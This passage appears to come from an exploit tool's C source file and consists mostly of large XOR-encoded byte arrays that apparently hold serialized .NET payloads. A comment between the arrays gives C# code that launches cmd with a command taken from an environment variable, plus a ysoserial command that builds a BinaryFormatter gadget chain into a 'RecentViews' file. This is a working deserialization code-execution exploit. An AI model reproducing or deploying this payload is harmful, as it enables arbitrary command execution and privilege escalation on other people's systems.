0x3A, 0xF2, 0x51, 0x07, 0xD6, 0xC9, 0x80, 0xD3, 0x2E, 0xF0, 0x59,\n\t0x1B, 0x86, 0x8D, 0x9C, 0xD2, 0x3B, 0xEE, 0x48, 0x0E, 0xB1, 0x87, 0xB0, 0xC8, 0x2B, 0xF7, 0x53,\n\t0x1D, 0xC9, 0xCB, 0xA8, 0xDF, 0x75, 0xD0, 0x48, 0x16, 0x98, 0x94, 0xF1, 0x87, 0x1A, 0xED, 0x58,\n\t0x08, 0xBA, 0x88, 0xBE, 0xC2, 0x72, 0xBC, 0x1F, 0x5A, 0xA4, 0x88, 0xA0, 0xD4, 0x38, 0xF1, 0x4F,\n\t0x1E, 0xC9, 0xCB, 0xA8, 0xDF, 0x75, 0xD0, 0x48, 0x16, 0x98, 0x94, 0xF1, 0x87, 0x0B, 0xF1, 0x50,\n\t0x1B, 0x9D, 0x87, 0xEE, 0x85, 0x6D, 0xBE, 0x71, 0x15, 0x95, 0x8D, 0x86, 0xD4, 0x2A, 0xEC, 0x6D,\n\t0x08, 0x9B, 0x8F, 0xBA, 0xCB, 0x2A, 0xA3, 0x1F, 0x3C, 0x95, 0x85, 0xA0, 0xC2, 0x6D, 0xBE, 0x7B,\n\t0x13, 0x98, 0x8C, 0x9D, 0xC6, 0x22, 0xFB, 0x00, 0x58, 0x97, 0x84, 0xB7, 0x85, 0x6F, 0xB1, 0x03,\n\t0x77, 0xFE, 0xC9, 0xF3, 0x87, 0x6F, 0xBE, 0x1D, 0x46, 0xDB, 0x9A, 0xB7, 0x9D, 0x1F, 0xEC, 0x52,\n\t0x19, 0x91, 0x9A, 0xA0, 0x89, 0x1C, 0xEA, 0x5C, 0x08, 0x80, 0xA0, 0xBD, 0xC1, 0x20, 0xA0, 0x30,\n\t0x70, 0xD4, 0xC9, 0xF3, 0x87, 0x73, 0xB1, 0x4E, 0x1E, 0xCE, 0xB9, 0xA1, 0xC8, 0x2C, 0xFB, 0x4E,\n\t0x09, 0xCA, 0xE4, 0xD9, 0x87, 0x6F, 0xA2, 0x12, 0x35, 0x96, 0x83, 0xB6, 0xC4, 0x3B, 0xDA, 0x5C,\n\t0x0E, 0x95, 0xB9, 0xA1, 0xC8, 0x39, 0xF7, 0x59, 0x1F, 0x86, 0xC7, 0x9C, 0xC5, 0x25, 0xFB, 0x5E,\n\t0x0E, 0xBD, 0x87, 0xA0, 0xD3, 0x2E, 0xF0, 0x5E, 0x1F, 0xCA, 0xE4, 0xD9, 0x9B, 0x60, 0xD1, 0x5F,\n\t0x10, 0x91, 0x8A, 0xA7, 0xE3, 0x2E, 0xEA, 0x5C, 0x2A, 0x86, 0x86, 0xA5, 0xCE, 0x2B, 0xFB, 0x4F,\n\t0x44, 0xFF, 0xE2\n};\n\n/*\n// ExploitClass.dll\nusing System;\n\nclass ExploitClass\n{\n\tpublic ExploitClass()\n\t{\n\t\tSystem.Diagnostics.Process.Start(\"cmd\", \"/c \" + Environment.GetEnvironmentVariable(\"pe386\"));\n\t}\n}\n\nysoserial_frmv2.exe -o raw -f BinaryFormatter -g ActivitySurrogateSelectorFromFile -c .\\ExploitClass.cs;System.dll > RecentViews\n*/\nstatic const unsigned char g_encodedRecentViewsV2[8427] = {\n\t0x7A, 0xF5, 0xE9, 0xD3, 0xA7, 0xB0, 0x61, 0xC2, 0x85, 0xF5, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF8, 0xEB, 0xD3, 0xA7, 0x4F, 0xD0, 0x6E, 0x03, 0x87, 0x9D, 0xB6, 0xCA, 0x61, 0xDA, 0x5C,\n\t0x0E, 0x95, 0xC5, 0xF3, 0xF1, 0x2A, 0xEC, 0x4E, 0x13, 0x9B, 0x87, 0xEE, 0x95, 0x61, 0xAE, 0x13,\n\t0x4A, 0xDA, 0xD9, 0xFF, 0x87, 0x0C, 0xEB, 0x51, 0x0E, 0x81, 0x9B, 0xB6, 0x9A, 0x21, 0xFB, 0x48,\n\t0x0E, 0x86, 0x88, 0xBF, 0x8B, 0x6F, 0xCE, 0x48, 0x18, 0x98, 0x80, 0xB0, 0xEC, 0x2A, 0xE7, 0x69,\n\t0x15, 0x9F, 0x8C, 0xBD, 0x9A, 0x2D, 0xA9, 0x0A, 0x1B, 0xC1, 0x8A, 0xE6, 0x91, 0x7E, 0xA7, 0x0E,\n\t0x4E, 0x91, 0xD9, 0xEB, 0x9E, 0x4A, 0x9F, 0x3D, 0x7A, 0xF4, 0xFA, 0x80, 0xDE, 0x3C, 0xEA, 0x58,\n\t0x17, 0xDA, 0xAD, 0xB2, 0xD3, 0x2E, 0xB0, 0x79, 0x1B, 0x80, 0x88, 0x80, 0xC2, 0x3B, 0x94, 0x3D,\n\t0x7A, 0xF4, 0xFF, 0x97, 0xC6, 0x3B, 0xFF, 0x6E, 0x1F, 0x80, 0xC7, 0x81, 0xC2, 0x22, 0xF1, 0x49,\n\t0x13, 0x9A, 0x8E, 0x95, 0xC8, 0x3D, 0xF3, 0x5C, 0x0E, 0xE7, 0xAD, 0xB2, 0xD3, 0x2E, 0xCD, 0x58,\n\t0x0E, 0xDA, 0xAD, 0xB2, 0xD3, 0x2E, 0xCD, 0x58, 0x0E, 0xBA, 0x88, 0xBE, 0xC2, 0x5E, 0xDA, 0x5C,\n\t0x0E, 0x95, 0xBA, 0xB6, 0xD3, 0x61, 0xD0, 0x5C, 0x17, 0x91, 0x9A, 0xA3, 0xC6, 0x2C, 0xFB, 0x33,\n\t0x3E, 0x95, 0x9D, 0xB2, 0xF4, 0x2A, 0xEA, 0x13, 0x2A, 0x86, 0x8C, 0xB5, 0xCE, 0x37, 0x8B, 0x79,\n\t0x1B, 0x80, 0x88, 0x80, 0xC2, 0x3B, 0xB0, 0x7E, 0x1B, 0x87, 0x8C, 0x80, 0xC2, 0x21, 0xED, 0x54,\n\t0x0E, 0x9D, 0x9F, 0xB6, 0xB5, 0x0B, 0xFF, 0x49, 0x1B, 0xA7, 0x8C, 0xA7, 0x89, 0x03, 0xF1, 0x5E,\n\t0x1B, 0x98, 0x8C, 0x9F, 0xE4, 0x06, 0xDA, 0x27, 0x3E, 0x95, 0x9D, 0xB2, 0xF4, 0x2A, 0xEA, 0x13,\n\t0x3F, 0x9A, 0x8F, 0xBC, 0xD5, 0x2C, 0xFB, 0x7E, 0x15, 0x9A, 0x9A, 0xA7, 0xD5, 0x2E, 0xF7, 0x53,\n\t0x0E, 0x87, 0xF3, 0x97, 0xC6, 0x3B, 0xFF, 0x6E, 0x1F, 0x80, 0xC7, 0x96, 0xDF, 0x3B, 0xFB, 0x53,\n\t0x1E, 0x91, 0x8D, 0x83, 0xD5, 0x20, 0xEE, 0x58, 0x08, 0x80, 0x80, 0xB6, 0xD4, 0x5B, 0xDA, 0x5C,\n\t0x0E, 0x95, 0xBA, 0xB6, 0xD3, 0x61, 0xCA, 0x5C, 0x18, 0x98, 0x8C, 0xA0, 0x89, 0x0C, 0xF1, 0x48,\n\t0x14, 0x80, 0xF9, 0x97, 0xC6, 0x3B, 0xFF, 0x6E, 0x1F, 0x80, 0xC7, 0x87, 0xC6, 0x2D, 0xF2, 0x58,\n\t0x09, 0xAB, 0xD9, 0xD7, 0xA6, 0x4E, 0x9F, 0x3D, 0x7A, 0xF4, 0xEB, 0xD3, 0xA0, 0x50, 0xCD, 0x44,\n\t0x09, 0x80, 0x8C, 0xBE, 0x89, 0x0B, 0xFF, 0x49, 0x1B, 0xDA, 0xBA, 0xB6, 0xD5, 0x26, 0xFF, 0x51,\n\t0x13, 0x8E, 0x88, 0xA7, 0xCE, 0x20, 0xF0, 0x7B, 0x15, 0x86, 0x84, 0xB2, 0xD3, 0x4D, 0x9E, 0x3D,\n\t0x7A, 0xF5, 0xE1, 0xD2, 0xAF, 0x4D, 0x9C, 0x3D, 0x7A, 0xF4, 0xEC, 0x2E, 0x58, 0xB0, 0x61, 0x22,\n\t0x29, 0x8D, 0x9A, 0xA7, 0xC2, 0x22, 0xB0, 0x79, 0x1B, 0x80, 0x88, 0xFD, 0xF4, 0x2A, 0xEC, 0x54,\n\t0x1B, 0x98, 0x80, 0xA9, 0xC6, 0x3B, 0xF7, 0x52, 0x14, 0xB2, 0x86, 0xA1, 0xCA, 0x2E, 0xEA, 0x3C,\n\t0x7A, 0xF4, 0xE9, 0xD4, 0xD1, 0x2E, 0xF2, 0x48, 0x1F, 0xAB, 0xB6, 0xD3, 0xAF, 0x4D, 0x9E, 0x3D,\n\t0x7A, 0xF5, 0xE9, 0xD3, 0xA7, 0x49, 0x9A, 0x3D, 0x7A, 0xF4, 0xE9, 0xDA, 0xA3, 0x4F, 0x9E, 0x3D,\n\t0x73, 0xF0, 0xE9, 0xD3, 0xA7, 0x4F, 0x97, 0x39, 0x7A, 0xF4, 0xE9, 0xD9, 0xA6, 0x4F, 0x9E, 0x3D,\n\t0x73, 0xF1, 0xE9, 0xD3, 0xA7, 0x40, 0x9B, 0x3D, 0x7A, 0xF4, 0x12, 0xCD, 0xA7, 0x4F, 0x9C, 0x3D,\n\t0x7B, 0xF4, 0xE9, 0xD3, 0x58, 0xB0, 0x61, 0xC2, 0x7B, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7E, 0xF5, 0xE9, 0xD3, 0xA7, 0x30, 0xCD, 0x44, 0x09, 0x80, 0x8C, 0xBE, 0x89, 0x0C, 0xF1, 0x51,\n\t0x16, 0x91, 0x8A, 0xA7, 0xCE, 0x20, 0xF0, 0x4E, 0x54, 0xB3, 0x8C, 0xBD, 0xC2, 0x3D, 0xF7, 0x5E,\n\t0x54, 0xB8, 0x80, 0xA0, 0xD3, 0x2F, 0xAF, 0x66, 0x21, 0xA7, 0x90, 0xA0, 0xD3, 0x2A, 0xF3, 0x13,\n\t0x35, 0x96, 0x83, 0xB6, 0xC4, 0x3B, 0xB2, 0x1D, 0x17, 0x87, 0x8A, 0xBC, 0xD5, 0x23, 0xF7, 0x5F,\n\t0x56, 0xD4, 0xBF, 0xB6, 0xD5, 0x3C, 0xF7, 0x52, 0x14, 0xC9, 0xDB, 0xFD, 0x97, 0x61, 0xAE, 0x13,\n\t0x4A, 0xD8, 0xC9, 0x90, 0xD2, 0x23, 0xEA, 0x48, 0x08, 0x91, 0xD4, 0xBD, 0xC2, 0x3A, 0xEA, 0x4F,\n\t0x1B, 0x98, 0xC5, 0xF3, 0xF7, 0x3A, 0xFC, 0x51, 0x13, 0x97, 0xA2, 0xB6, 0xDE, 0x1B, 0xF1, 0x56,\n\t0x1F, 0x9A, 0xD4, 0xB1, 0x90, 0x78, 0xFF, 0x08, 0x19, 0xC1, 0xDF, 0xE2, 0x9E, 0x7C, 0xAA, 0x58,\n\t0x4A, 0xCC, 0xD0, 0x8E, 0xFA, 0x4C, 0x9E, 0x3D, 0x7A, 0xF2, 0xB6, 0xBA, 0xD3, 0x2A, 0xF3, 0x4E,\n\t0x7F, 0xAB, 0x9A, 0xBA, 0xDD, 0x2A, 0x96, 0x62, 0x0C, 0x91, 0x9B, 0xA0, 0xCE, 0x20, 0xF0, 0x38,\n\t0x7A, 0xF4, 0xE1, 0xDB, 0xAE, 0x4D, 0x9E, 0x3D, 0x7A, 0xF3, 0xE9, 0xD3, 0xA7, 0x48, 0x9E, 0x3D,\n\t0x7A, 0xE4, 0xEB, 0xD3, 0xA7, 0x4F, 0x96, 0x3D, 0x7A, 0xF4, 0xE0, 0xD0, 0xA7, 0x4F, 0x9E, 0x34,\n\t0x7E, 0xF4, 0xE9, 0xD3, 0xAE, 0x4A, 0x9E, 0x3D, 0x7A, 0xFD, 0xEF, 0xD3, 0xA7, 0x4F, 0x97, 0x3A,\n\t0x7A, 0xF4, 0xE9, 0xDA, 0xAF, 0x4F, 0x9E, 0x3D, 0x73, 0xFD, 0xE9, 0xD3, 0xA7, 0x45, 0x92, 0x37,\n\t0x7A, 0xF4, 0xE9, 0xB2, 0xF4, 0x36, 0xED, 0x49, 0x1F, 0x99, 0xC7, 0x84, 0xC8, 0x3D, 0xF5, 0x5B,\n\t0x16, 0x9B, 0x9E, 0xFD, 0xE4, 0x20, 0xF3, 0x4D, 0x15, 0x9A, 0x8C, 0xBD, 0xD3, 0x02, 0xF1, 0x59,\n\t0x1F, 0x98, 0xC5, 0xF3, 0xF1, 0x2A, 0xEC, 0x4E, 0x13, 0x9B, 0x87, 0xEE, 0x94, 0x61, 0xAE, 0x13,\n\t0x4A, 0xDA, 0xD9, 0xFF, 0x87, 0x0C, 0xEB, 0x51, 0x0E, 0x81, 0x9B, 0xB6, 0x9A, 0x21, 0xFB, 0x48,\n\t0x0E, 0x86, 0x88, 0xBF, 0x8B, 0x6F, 0xCE, 0x48, 0x18, 0x98, 0x80, 0xB0, 0xEC, 0x2A, 0xE7, 0x69,\n\t0x15, 0x9F, 0x8C, 0xBD, 0x9A, 0x7C, 0xAF, 0x5F, 0x1C, 0xC7, 0xD1, 0xE6, 0x91, 0x2E, 0xFA, 0x0E,\n\t0x4C, 0xC0, 0x8C, 0xE0, 0x92, 0x4A, 0x9D, 0x3D, 0x7A, 0xF4, 0x83, 0x80, 0xDE, 0x3C, 0xEA, 0x58,\n\t0x17, 0xDA, 0xBE, 0xBC, 0xD5, 0x24, 0xF8, 0x51, 0x15, 0x83, 0xC7, 0x90, 0xC8, 0x22, 0xEE, 0x52,\n\t0x14, 0x91, 0x87, 0xA7, 0xEA, 0x20, 0xFA, 0x58, 0x16, 0xDA, 0xBA, 0xB6, 0xD5, 0x26, 0xFF, 0x51,\n\t0x13, 0x8E, 0x88, 0xA7, 0xCE, 0x20, 0xF0, 0x13, 0x3B, 0x97, 0x9D, 0xBA, 0xD1, 0x26, 0xEA, 0x44,\n\t0x29, 0x81, 0x9B, 0xA1, 0xC8, 0x28, 0xFF, 0x49, 0x1F, 0xA7, 0x8C, 0xBF, 0xC2, 0x2C, 0xEA, 0x52,\n\t0x08, 0xDF, 0xA6, 0xB1, 0xCD, 0x2A, 0xFD, 0x49, 0x29, 0x81, 0x9B, 0xA1, 0xC8, 0x28, 0xFF, 0x49,\n\t0x1F, 0xDF, 0xA6, 0xB1, 0xCD, 0x2A, 0xFD, 0x49, 0x29, 0x91, 0x9B, 0xBA, 0xC6, 0x23, 0xF7, 0x47,\n\t0x1F, 0x90, 0xBB, 0xB6, 0xC1, 0x4D, 0x9E, 0x3D, 0x7A, 0xF0, 0x9D, 0xAA, 0xD7, 0x2A, 0x95, 0x50,\n\t0x1F, 0x99, 0x8B, 0xB6, 0xD5, 0x0B, 0xFF, 0x49, 0x1B, 0x87, 0xEA, 0xD6, 0xB8, 0x1C, 0xE7, 0x4E,\n\t0x0E, 0x91, 0x84, 0xFD, 0xF2, 0x21, 0xF7, 0x49, 0x03, 0xA7, 0x8C, 0xA1, 0xCE, 0x2E, 0xF2, 0x54,\n\t0x00, 0x95, 0x9D, 0xBA, 0xC8, 0x21, 0xD6, 0x52, 0x16, 0x90, 0x8C, 0xA1, 0xAD, 0x4F, 0x9E, 0x3D,\n\t0x73, 0xFF, 0xE9, 0xD3, 0xA7, 0x46, 0x92, 0x3D, 0x7A, 0xF4, 0xE8, 0xD7, 0xA7, 0x4F, 0x9E, 0x3E,\n\t0x7A, 0xF4, 0xE9, 0xDA, 0xAA, 0x4F, 0x9E, 0x3D, 0x73, 0xFA, 0xE9, 0xD3, 0xA7, 0x4E, 0x9B, 0x3D,\n\t0x7A, 0xF4, 0xEA, 0xD3, 0xA7, 0x4F, 0x97, 0x32, 0x7A, 0xF4, 0xE9, 0xDA, 0xB7, 0x4F, 0x9E, 0x3D,\n\t0x7B, 0xF2, 0xE9, 0xD3, 0xA7, 0x4C, 0x9E, 0x3D, 0x7A, 0xFD, 0xF8, 0xD3, 0xA7, 0x4F, 0x97, 0x2F,\n\t0x7A, 0xF4, 0xE9, 0xD2, 0xA0, 0x4F, 0x9E, 0x3D, 0x79, 0xF4, 0xE9, 0xD3, 0xAE, 0x5C, 0x9E, 0x3D,\n\t0x7A, 0xFD, 0xFD, 0xD3, 0xA7, 0x4F, 0x9F, 0x35, 0x7A, 0xF4, 0xE9, 0xD0, 0xA7, 0x4F, 0x9E, 0x34,\n\t0x6F, 0xF4, 0xE9, 0xD3, 0xAE, 0x59, 0x9E, 0x3D, 0x7A, 0xF0, 0xE0, 0xD3, 0xA7, 0x4F, 0x82, 0x6E,\n\t0x03, 0x87, 0x9D, 0xB6, 0xCA, 0x61, 0xDD, 0x52, 0x16, 0x98, 0x8C, 0xB0, 0xD3, 0x26, 0xF1, 0x53,\n\t0x09, 0xDA, 0xA1, 0xB2, 0xD4, 0x27, 0xEA, 0x5C, 0x18, 0x98, 0x8C, 0xD4, 0xA7, 0x4F, 0x9E, 0x37,\n\t0x36, 0x9B, 0x88, 0xB7, 0xE1, 0x2E, 0xFD, 0x49, 0x15, 0x86, 0xEE, 0x85, 0xC2, 0x3D, 0xED, 0x54,\n\t0x15, 0x9A, 0xE1, 0x90, 0xC8, 0x22, 0xEE, 0x5C, 0x08, 0x91, 0x9B, 0xC3, 0xEF, 0x2E, 0xED, 0x55,\n\t0x39, 0x9B, 0x8D, 0xB6, 0xF7, 0x3D, 0xF1, 0x4B, 0x13, 0x90, 0x8C, 0xA1, 0xAF, 0x07, 0xFF, 0x4E,\n\t0x12, 0xA7, 0x80, 0xA9, 0xC2, 0x4B, 0xD5, 0x58, 0x03, 0x87, 0xEF, 0x85, 0xC6, 0x23, 0xEB, 0x58,\n\t0x09, 0xF4, 0xE9, 0xD0, 0xA4, 0x4F, 0x9B, 0x38, 0x71, 0xFC, 0xF5, 0x80, 0xDE, 0x3C, 0xEA, 0x58,\n\t0x17, 0xDA, 0xAA, 0xBC, 0xCB, 0x23, 0xFB, 0x5E, 0x0E, 0x9D, 0x86, 0xBD, 0xD4, 0x61, 0xD7, 0x7E,\n\t0x15, 0x99, 0x99, 0xB2, 0xD5, 0x2A, 0xEC, 0x19, 0x29, 0x8D, 0x9A, 0xA7, 0xC2, 0x22, 0xB0, 0x7E,\n\t0x15, 0x98, 0x85, 0xB6, 0xC4, 0x3B, 0xF7, 0x52, 0x14, 0x87, 0xC7, 0x9A, 0xEF, 0x2E, 0xED, 0x55,\n\t0x39, 0x9B, 0x8D, 0xB6, 0xF7, 0x3D, 0xF1, 0x4B, 0x13, 0x90, 0x8C, 0xA1, 0xAF, 0xA3, 0xCF, 0x05,\n\t0x45, 0xF6, 0xE9, 0xD3, 0xA7, 0x45, 0x94, 0x36, 0x7A, 0xF4, 0xE9, 0xDA, 0xB0, 0x4F, 0x9E, 0x3D,\n\t0x73, 0xEC, 0xE9, 0xD3, 0xA7, 0x4B, 0x95, 0x3D, 0x7A, 0xF4, 0xF6, 0x80, 0xDE, 0x3C, 0xEA, 0x58,\n\t0x17, 0xDA, 0xBC, 0xBD, 0xCE, 0x3B, 0xE7, 0x6E, 0x1F, 0x86, 0x80, 0xB2, 0xCB, 0x26, 0xE4, 0x5C,\n\t0x0E, 0x9D, 0x86, 0xBD, 0xEF, 0x20, 0xF2, 0x59, 0x1F, 0x86, 0xEA, 0xD3, 0xA7, 0x4F, 0x9A, 0x79,\n\t0x1B, 0x80, 0x88, 0xDA, 0xF2, 0x21, 0xF7, 0x49, 0x03, 0xA0, 0x90, 0xA3, 0xC2, 0x43, 0xDF, 0x4E,\n\t0x09, 0x91, 0x84, 0xB1, 0xCB, 0x36, 0xD0, 0x5C, 0x17, 0x91, 0xE8, 0xD3, 0xA6, 0x47, 0x98, 0x24,\n\t0x7A, 0xF4, 0xE9, 0x2B, 0xA6, 0x1C, 0xE7, 0x4E, 0x0E, 0x91, 0x84, 0xFD, 0xEB, 0x26, 0xF0, 0x4C,\n\t0x54, 0xB1, 0x87, 0xA6, 0xCA, 0x2A, 0xEC, 0x5C, 0x18, 0x98, 0x8C, 0xF8, 0xF0, 0x27, 0xFB, 0x4F,\n\t0x1F, 0xA7, 0x8C, 0xBF, 0xC2, 0x2C, 0xEA, 0x71, 0x13, 0x87, 0x9D, 0x9A, 0xD3, 0x2A, 0xEC, 0x5C,\n\t0x0E, 0x9B, 0x9B, 0xB3, 0x95, 0x14, 0xC5, 0x6E, 0x03, 0x87, 0x9D, 0xB6, 0xCA, 0x61, 0xDC, 0x44,\n\t0x0E, 0x91, 0xB2, 0x8E, 0x8B, 0x6F, 0xF3, 0x4E, 0x19, 0x9B, 0x9B, 0xBF, 0xCE, 0x2D, 0xB2, 0x1D,\n\t0x2C, 0x91, 0x9B, 0xA0, 0xCE, 0x20, 0xF0, 0x00, 0x48, 0xDA, 0xD9, 0xFD, 0x97, 0x61, 0xAE, 0x11,\n\t0x5A, 0xB7, 0x9C, 0xBF, 0xD3, 0x3A, 0xEC, 0x58, 0x47, 0x9A, 0x8C, 0xA6, 0xD3, 0x3D, 0xFF, 0x51,\n\t0x56, 0xD4, 0xB9, 0xA6, 0xC5, 0x23, 0xF7, 0x5E, 0x31, 0x91, 0x90, 0x87, 0xC8, 0x24, 0xFB, 0x53,\n\t0x47, 0x96, 0xDE, 0xE4, 0xC6, 0x7A, 0xFD, 0x08, 0x4C, 0xC5, 0xD0, 0xE0, 0x93, 0x2A, 0xAE, 0x05,\n\t0x43, 0xA9, 0xC5, 0x88, 0xF4, 0x36, 0xED, 0x49, 0x1F, 0x99, 0xC7, 0x81, 0xC2, 0x29, 0xF2, 0x58,\n\t0x19, 0x80, 0x80, 0xBC, 0xC9, 0x61, 0xDF, 0x4E, 0x09, 0x91, 0x84, 0xB1, 0xCB, 0x36, 0xB2, 0x1D,\n\t0x17, 0x87, 0x8A, 0xBC, 0xD5, 0x23, 0xF7, 0x5F, 0x56, 0xD4, 0xBF, 0xB6, 0xD5, 0x3C, 0xF7, 0x52,\n\t0x14, 0xC9, 0xDB, 0xFD, 0x97, 0x61, 0xAE, 0x13, 0x4A, 0xD8, 0xC9, 0x90, 0xD2, 0x23, 0xEA, 0x48,\n\t0x08, 0x91, 0xD4, 0xBD, 0xC2, 0x3A, 0xEA, 0x4F, 0x1B, 0x98, 0xC5, 0xF3, 0xF7, 0x3A, 0xFC, 0x51,\n\t0x13, 0x97, 0xA2, 0xB6, 0xDE, 0x1B, 0xF1, 0x56, 0x1F, 0x9A, 0xD4, 0xB1, 0x90, 0x78, 0xFF, 0x08,\n\t0x19, 0xC1, 0xDF, 0xE2, 0x9E, 0x7C, 0xAA, 0x58, 0x4A, 0xCC, 0xD0, 0x8E, 0xFA, 0x4B, 0x9E, 0x3D,\n\t0x7A, 0xF2, 0xF3, 0xD3, 0xA7, 0x4F, 0xD0, 0x6E, 0x03, 0x87, 0x9D, 0xB6, 0xCA, 0x61, 0xDD, 0x52,\n\t0x08, 0x91, 0xC5, 0xF3, 0xF1, 0x2A, 0xEC, 0x4E, 0x13, 0x9B, 0x87, 0xEE, 0x94, 0x61, 0xAB, 0x13,\n\t0x4A, 0xDA, 0xD9, 0xFF, 0x87, 0x0C, 0xEB, 0x51, 0x0E, 0x81, 0x9B, 0xB6, 0x9A, 0x21, 0xFB, 0x48,\n\t0x0E, 0x86, 0x88, 0xBF, 0x8B, 0x6F, 0xCE, 0x48, 0x18, 0x98, 0x80, 0xB0, 0xEC, 0x2A, 0xE7, 0x69,\n\t0x15, 0x9F, 0x8C, 0xBD, 0x9A, 0x2D, 0xA9, 0x0A, 0x1B, 0xC1, 0x8A, 0xE6, 0x91, 0x7E, 0xA7, 0x0E,\n\t0x4E, 0x91, 0xD9, 0xEB, 0x9E, 0x5F, 0x92, 0x3D, 0x7A, 0xF4, 0xEE, 0xD3, 0xA7, 0x4F, 0x97, 0x26,\n\t0x7A, 0xF4, 0xE9, 0xD9, 0xAE, 0x53, 0x9E, 0x3D, 0x7A, 0xFD, 0xF4, 0xD3, 0xA7, 0x4F, 0x96, 0x35,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xAD, 0x47, 0x96, 0x3C, 0x7A, 0xF4, 0xE9, 0xD2, 0xAA, 0x4F, 0x9E, 0x3D,\n\t0x71, 0xF4, 0xE9, 0xD3, 0xA1, 0x51, 0x9E, 0x3D, 0x7A, 0x0C, 0xE8, 0x80, 0xDE, 0x3C, 0xEA, 0x58,\n\t0x17, 0xDA, 0xA5, 0xBA, 0xC9, 0x3E, 0xB0, 0x78, 0x14, 0x81, 0x84, 0xB6, 0xD5, 0x2E, 0xFC, 0x51,\n\t0x1F, 0xDF, 0xD5, 0x80, 0xC2, 0x23, 0xFB, 0x5E, 0x0E, 0xB9, 0x88, 0xBD, 0xDE, 0x06, 0xEA, 0x58,\n\t0x08, 0x95, 0x9D, 0xBC, 0xD5, 0x71, 0xFA, 0x62, 0x25, 0xC5, 0xDD, 0xB3, 0x95, 0x14, 0xC5, 0x6E,\n\t0x03, 0x87, 0x9D, 0xB6, 0xCA, 0x61, 0xCC, 0x58, 0x1C, 0x98, 0x8C, 0xB0, 0xD3, 0x26, 0xF1, 0x53,\n\t0x54, 0xB5, 0x9A, 0xA0, 0xC2, 0x22, 0xFC, 0x51, 0x03, 0xD8, 0xC9, 0xBE, 0xD4, 0x2C, 0xF1, 0x4F,\n\t0x16, 0x9D, 0x8B, 0xFF, 0x87, 0x19, 0xFB, 0x4F, 0x09, 0x9D, 0x86, 0xBD, 0x9A, 0x7D, 0xB0, 0x0D,\n\t0x54, 0xC4, 0xC7, 0xE3, 0x8B, 0x6F, 0xDD, 0x48, 0x16, 0x80, 0x9C, 0xA1, 0xC2, 0x72, 0xF0, 0x58,\n\t0x0F, 0x80, 0x9B, 0xB2, 0xCB, 0x63, 0xBE, 0x6D, 0x0F, 0x96, 0x85, 0xBA, 0xC4, 0x04, 0xFB, 0x44,\n\t0x2E, 0x9B, 0x82, 0xB6, 0xC9, 0x72, 0xFC, 0x0A, 0x4D, 0x95, 0xDC, 0xB0, 0x92, 0x79, 0xAF, 0x04,\n\t0x49, 0xC0, 0x8C, 0xE3, 0x9F, 0x76, 0xC3, 0x11, 0x21, 0xA7, 0x90, 0xA0, 0xD3, 0x2A, 0xF3, 0x13,\n\t0x2E, 0x8D, 0x99, 0xB6, 0x8B, 0x6F, 0xF3, 0x4E, 0x19, 0x9B, 0x9B, 0xBF, 0xCE, 0x2D, 0xB2, 0x1D,\n\t0x2C, 0x91, 0x9B, 0xA0, 0xCE, 0x20, 0xF0, 0x00, 0x48, 0xDA, 0xD9, 0xFD, 0x97, 0x61, 0xAE, 0x11,\n\t0x5A, 0xB7, 0x9C, 0xBF, 0xD3, 0x3A, 0xEC, 0x58, 0x47, 0x9A, 0x8C, 0xA6, 0xD3, 0x3D, 0xFF, 0x51,\n\t0x56, 0xD4, 0xB9, 0xA6, 0xC5, 0x23, 0xF7, 0x5E, 0x31, 0x91, 0x90, 0x87, 0xC8, 0x24, 0xFB, 0x53,\n\t0x47, 0x96, 0xDE, 0xE4, 0xC6, 0x7A, 0xFD, 0x08, 0x4C, 0xC5, 0xD0, 0xE0, 0x93, 0x2A, 0xAE, 0x05,\n\t0x43, 0xA9, 0xB4, 0xD7, 0xA7, 0x4F, 0x9E, 0x34, 0x60, 0xF4, 0xE9, 0xD3, 0xB7, 0x41, 0x9E, 0x3D,\n\t0x7A, 0xFF, 0xE9, 0xD3, 0xA7, 0x45, 0x96, 0x35, 0x84, 0x0B, 0x16, 0x2C, 0xAF, 0x47, 0x9F, 0x3D,\n\t0x7A, 0xF4, 0xE3, 0xDA, 0xA4, 0x4F, 0x9E, 0x3D, 0x70, 0xFD, 0xC8, 0xD3, 0xA7, 0x4F, 0x93, 0x39,\n\t0x7B, 0xFB, 0xE9, 0xD3, 0xA7, 0x44, 0x9E, 0x3D, 0x7A, 0xF2, 0xCB, 0xD3, 0xA7, 0x4F, 0x71, 0x3C,\n\t0x29, 0x8D, 0x9A, 0xA7, 0xC2, 0x22, 0xB0, 0x71, 0x13, 0x9A, 0x98, 0xFD, 0xE2, 0x21, 0xEB, 0x50,\n\t0x1F, 0x86, 0x88, 0xB1, 0xCB, 0x2A, 0xB5, 0x6A, 0x12, 0x91, 0x9B, 0xB6, 0xF4, 0x2A, 0xF2, 0x58,\n\t0x19, 0x80, 0xAC, 0xBD, 0xD2, 0x22, 0xFB, 0x4F, 0x1B, 0x96, 0x85, 0xB6, 0xEE, 0x3B, 0xFB, 0x4F,\n\t0x1B, 0x80, 0x86, 0xA1, 0xC7, 0x7D, 0xC5, 0x66, 0x29, 0x8D, 0x9A, 0xA7, 0xC2, 0x22, 0xB0, 0x69,\n\t0x03, 0x84, 0x8C, 0xFF, 0x87, 0x22, 0xED, 0x5E, 0x15, 0x86, 0x85, 0xBA, 0xC5, 0x63, 0xBE, 0x6B,\n\t0x1F, 0x86, 0x9A, 0xBA, 0xC8, 0x21, 0xA3, 0x0F, 0x54, 0xC4, 0xC7, 0xE3, 0x89, 0x7F, 0xB2, 0x1D,\n\t0x39, 0x81, 0x85, 0xA7, 0xD2, 0x3D, 0xFB, 0x00, 0x14, 0x91, 0x9C, 0xA7, 0xD5, 0x2E, 0xF2, 0x11,\n\t0x5A, 0xA4, 0x9C, 0xB1, 0xCB, 0x26, 0xFD, 0x76, 0x1F, 0x8D, 0xBD, 0xBC, 0xCC, 0x2A, 0xF0, 0x00,\n\t0x18, 0xC3, 0xDE, 0xB2, 0x92, 0x2C, 0xAB, 0x0B, 0x4B, 0xCD, 0xDA, 0xE7, 0xC2, 0x7F, 0xA6, 0x04,\n\t0x27, 0xD8, 0xB2, 0x80, 0xDE, 0x3C, 0xEA, 0x58, 0x17, 0xDA, 0xA6, 0xB1, 0xCD, 0x2A, 0xFD, 0x49,\n\t0x56, 0xD4, 0x84, 0xA0, 0xC4, 0x20, 0xEC, 0x51, 0x13, 0x96, 0xC5, 0xF3, 0xF1, 